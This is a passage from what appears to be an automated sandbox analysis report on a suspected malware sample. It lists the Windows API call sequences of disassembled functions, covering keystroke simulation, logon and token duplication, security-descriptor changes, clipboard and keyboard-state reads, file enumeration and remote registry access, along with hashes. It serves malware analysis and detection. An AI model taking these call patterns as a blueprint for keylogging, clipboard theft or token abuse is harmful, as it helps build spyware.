                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078FD54
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078FD5D
                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078FD62
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078FD6C
                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078FD71
                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0078FD74
                                                                                                                                                                                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0078FD9B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                          • API String ID: 4125248594-2988720461
                                                                                                                                                                                          • Opcode ID: ec43d8851965e9978f573dba08c1bfee9051564bd4a314ba6c0514984af57274
                                                                                                                                                                                          • Instruction ID: 12c0c6645bd94f365a66466264bdb869b896574ebd0681065851dea68582d49d
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec43d8851965e9978f573dba08c1bfee9051564bd4a314ba6c0514984af57274
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25315071B80218BBEB306BA55C4AFBE7F6CEB44B50F114079FA01E61D1D6B85D10ABB4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00792010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079205A
                                                                                                                                                                                            • Part of subcall function 00792010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00792087
                                                                                                                                                                                            • Part of subcall function 00792010: GetLastError.KERNEL32 ref: 00792097
                                                                                                                                                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00791BD2
                                                                                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00791BF4
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00791C05
                                                                                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00791C1D
                                                                                                                                                                                          • GetProcessWindowStation.USER32 ref: 00791C36
                                                                                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00791C40
                                                                                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00791C5C
                                                                                                                                                                                            • Part of subcall function 00791A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00791B48), ref: 00791A20
                                                                                                                                                                                            • Part of subcall function 00791A0B: CloseHandle.KERNEL32(?,?,00791B48), ref: 00791A35
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                          • String ID: $default$winsta0
                                                                                                                                                                                          • API String ID: 22674027-1027155976
                                                                                                                                                                                          • Opcode ID: 0e3c4f4e5cbc5675326df1de52428536e9a2034af52bdde9d89a804dce2e88fa
                                                                                                                                                                                          • Instruction ID: 29a4da4732408f84930c48055ed94752f6c0f11eef052bce1c5ea0c59eb0418e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e3c4f4e5cbc5675326df1de52428536e9a2034af52bdde9d89a804dce2e88fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60816F71A0120AAFDF219FA4EC49FEE7BB8EF04304F548029F915A61A0D7798D65CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00791A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00791A60
                                                                                                                                                                                            • Part of subcall function 00791A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A6C
                                                                                                                                                                                            • Part of subcall function 00791A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A7B
                                                                                                                                                                                            • Part of subcall function 00791A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A82
                                                                                                                                                                                            • Part of subcall function 00791A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00791A99
                                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00791518
                                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079154C
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00791563
                                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0079159D
                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007915B9
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 007915D0
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 007915D8
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 007915DF
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00791600
                                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00791607
                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00791636
                                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00791658
                                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0079166A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00791691
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00791698
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007916A1
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007916A8
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007916B1
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007916B8
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007916C4
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007916CB
                                                                                                                                                                                            • Part of subcall function 00791ADF: GetProcessHeap.KERNEL32(00000008,007914FD,?,00000000,?,007914FD,?), ref: 00791AED
                                                                                                                                                                                            • Part of subcall function 00791ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,007914FD,?), ref: 00791AF4
                                                                                                                                                                                            • Part of subcall function 00791ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007914FD,?), ref: 00791B03
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                                          • Opcode ID: 614d3cf670a1df834277f784e6d46ce9bc148c2e49c195c18f11ae575cd3d8a4
                                                                                                                                                                                          • Instruction ID: 315ed270bb76591aaa487b238c9bef76ebc3513fbfaaab18f79807339471d9e0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 614d3cf670a1df834277f784e6d46ce9bc148c2e49c195c18f11ae575cd3d8a4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 14715F7190020AABDF10DFA5EC48FAEBBB8BF04340F498529E915A7290DB399D15CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenClipboard.USER32(007CDCD0), ref: 007AF586
                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 007AF594
                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 007AF5A0
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 007AF5AC
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 007AF5E4
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 007AF5EE
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 007AF619
                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 007AF626
                                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 007AF62E
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 007AF63F
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?), ref: 007AF67F
                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 007AF695
                                                                                                                                                                                          • GetClipboardData.USER32(0000000F), ref: 007AF6A1
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 007AF6B2
                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 007AF6D4
                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 007AF6F1
                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 007AF72F
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?), ref: 007AF750
                                                                                                                                                                                          • CountClipboardFormats.USER32 ref: 007AF771
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 007AF7B6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 420908878-0
                                                                                                                                                                                          • Opcode ID: 8e2e3146e69288c43dfbd4ae449edf2b6c309d848b8b04482f82241c5029e504
                                                                                                                                                                                          • Instruction ID: a54e63695540a007adeb7801d49148dcbc06c70c5cd5446b21172cd22def68c0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e2e3146e69288c43dfbd4ae449edf2b6c309d848b8b04482f82241c5029e504
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE61E031204301AFD310EF60D899F6ABBA4EF85744F54866DF846872A2DB39ED45CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 007A7403
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 007A7457
                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007A7493
                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007A74BA
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 007A74F7
                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 007A7524
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                          • API String ID: 3830820486-3289030164
                                                                                                                                                                                          • Opcode ID: b861af17e4b14eb9ec9e24977ce1c5c3dea93e39761fc34bba9712f0e705b377
                                                                                                                                                                                          • Instruction ID: 8564b671c93e7aa8c4e1b39e310de265f3ad36d8d65c462f856edc1353d5294b
                                                                                                                                                                                          • Opcode Fuzzy Hash: b861af17e4b14eb9ec9e24977ce1c5c3dea93e39761fc34bba9712f0e705b377
                                                                                                                                                                                          • Instruction Fuzzy Hash: BDD16FB2508344EED314EB64CC85EBBB7ECAF88704F40491DF585D6292EB78DA44CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007AA0A8
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 007AA0E6
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 007AA100
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 007AA118
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 007AA123
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 007AA13F
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007AA18F
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(007F7B94), ref: 007AA1AD
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007AA1B7
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 007AA1C4
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 007AA1D4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                          • API String ID: 1409584000-438819550
                                                                                                                                                                                          • Opcode ID: 7fbfd6c0f7e176e052acf186fa3cd4ce61e14b5c06c6044b6e8f7702f3cd9ed9
                                                                                                                                                                                          • Instruction ID: 0894b945b1cc69528892ceefdd212ec2b01fbf136c09f2c0c0db7822b96e2a7c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fbfd6c0f7e176e052acf186fa3cd4ce61e14b5c06c6044b6e8f7702f3cd9ed9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B31E37150120DBBDB20AFA4DC49EDE73BCAF86321F0042A9E815D2190EB7CDE84CB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007A4785
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A47B2
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 007A47E2
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007A4803
                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 007A4813
                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007A489A
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007A48A5
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007A48B0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                          • String ID: :$\$\??\%s
                                                                                                                                                                                          • API String ID: 1149970189-3457252023
                                                                                                                                                                                          • Opcode ID: 183a51efdf2cc8f7feda268be1e25f93fffbf6b7c41f92470ff272bf68c2b435
                                                                                                                                                                                          • Instruction ID: a505cb8a503192d67a571744ca7d2544a1ffd270a70794d7b57458ad296c84c0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 183a51efdf2cc8f7feda268be1e25f93fffbf6b7c41f92470ff272bf68c2b435
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4031B4B1500149ABDB219FA0DC49FEB37BCFFCA741F1081BAF509D2060E7B89A458B24
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007AA203
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 007AA25E
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 007AA269
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 007AA285
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007AA2D5
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(007F7B94), ref: 007AA2F3
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007AA2FD
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 007AA30A
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 007AA31A
                                                                                                                                                                                            • Part of subcall function 0079E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0079E3B4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                          • API String ID: 2640511053-438819550
                                                                                                                                                                                          • Opcode ID: 786f23319af0db5fb430c87744f29709ea3af7b5aea7e08fa8aab0e83bd50998
                                                                                                                                                                                          • Instruction ID: 58330d9d813c7ffad94701756234930c2adf03139dad3fcfba0624fd909650af
                                                                                                                                                                                          • Opcode Fuzzy Hash: 786f23319af0db5fb430c87744f29709ea3af7b5aea7e08fa8aab0e83bd50998
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4631C77150021DBECF20AFA4DC49EDE77ADAF86324F1042A9E810A21D0DB7DDE95CB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BC10E,?,?), ref: 007BD415
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD451
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4C8
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4FE
                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007BC99E
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 007BCA09
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007BCA2D
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007BCA8C
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007BCB47
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 007BCBB4
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 007BCC49
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 007BCC9A
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 007BCD43
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007BCDE2
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007BCDEF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3102970594-0
                                                                                                                                                                                          • Opcode ID: e70894e939a69fed297ea742fd6d2025285efccfc0b93706c4f3366635dedeea
                                                                                                                                                                                          • Instruction ID: b5c9014ff65fd51d47b3d4cfaeb004a6989ba5abdada22fae82e276dd93090a9
                                                                                                                                                                                          • Opcode Fuzzy Hash: e70894e939a69fed297ea742fd6d2025285efccfc0b93706c4f3366635dedeea
                                                                                                                                                                                          • Instruction Fuzzy Hash: C6023A75604200AFD715DF28C895F6ABBE5AF48304F18C4ADF849CB2A2DB35ED46CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0079A65D
                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 0079A6DE
                                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 0079A6F9
                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 0079A713
                                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 0079A728
                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 0079A740
                                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0079A752
                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0079A76A
                                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 0079A77C
                                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 0079A794
                                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 0079A7A6
                                                                                                                                                                                          Memory Dump Source
